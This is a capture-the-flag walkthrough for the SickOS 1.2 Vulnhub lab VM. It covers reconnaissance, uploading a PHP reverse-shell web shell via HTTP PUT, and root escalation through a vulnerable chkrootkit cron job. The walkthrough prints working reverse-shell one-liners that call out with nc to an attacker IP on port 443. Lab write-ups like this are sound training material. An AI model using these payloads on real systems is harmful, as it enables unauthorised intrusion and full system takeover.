SickOS 1.2 – Vulnhub CTF Challenge Walkthrough

SickOS 1.2 is the second Boot2Root Challenge in SickOS Series and is available at Vulnhub. This is an interesting CTF and requires think-out-of-the-box mentality. This VM is intended for “Intermediates” and should take a couple of hours to get root.

In this walkthrough, I’ll be using Parrot Security OS but you can use Kali or any other distro.

Turn on the Virtual Machine and use Netdiscover to determine the IP. Then register this IP to your local DNS file “/etc/hosts”.

sudo netdiscover -r [IP/subnet]
sudo nano /etc/hosts

 

Run a full port Nmap scan.

 

There is an HTTP Server running.

 

There’s no “robots.txt” file so we need to run a dirb scan.

dirb http://sick.local/

 

There’s an empty directory called “/test/”.

 

When we test the Server, we see that PUT and DELETE commands are enabled. Now, try to put something to the Server. Fire up Burp Suite and in Repeater, set up the host as “sick.local” and port 80 and write

PUT /test/hello HTTP/1.1
Host: sick.local
Content-Length: 11

Hello World

 

Now, verify it using curl.

curl http://sick.local/test/hello

 

Next, try to PUT a PHP Reverse Shell. Note that the outbound traffic except port 443 is blocked by Firewall, so in reverse shell, use port 443

PUT /test/reverse.php HTTP/1.1
Host: sick.local
Content-Length: 107

<?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f"); ?>

 

We got a reverse shell.

 

Spawn a “pty” shell.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

 

Now, we got to escalate our privileges to root. After some research, I found some interesting Cron Jobs running

 

Check the version of “chkrootkit”.

According to exploit-DB, this version of “chkrootkit” is vulnerable to privilege escalation attacks. All you need to is to put your malicious code in “update” file in “/tmp/” directory and wait for Cron Job to execute our code.

echo '#!/bin/bash' > update
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f' >> update
chmod 777 update

Now, wait for our reverse shell.

Finally, we got ROOT Privileges.

Related posts

Water Facilities Must Secure Exposed HMIs – Warns CISA

Microsoft December Patch Tuesday Arrived With 70+ Bug Fixes

NachoVPN Attack Risks Corporate VPN Clients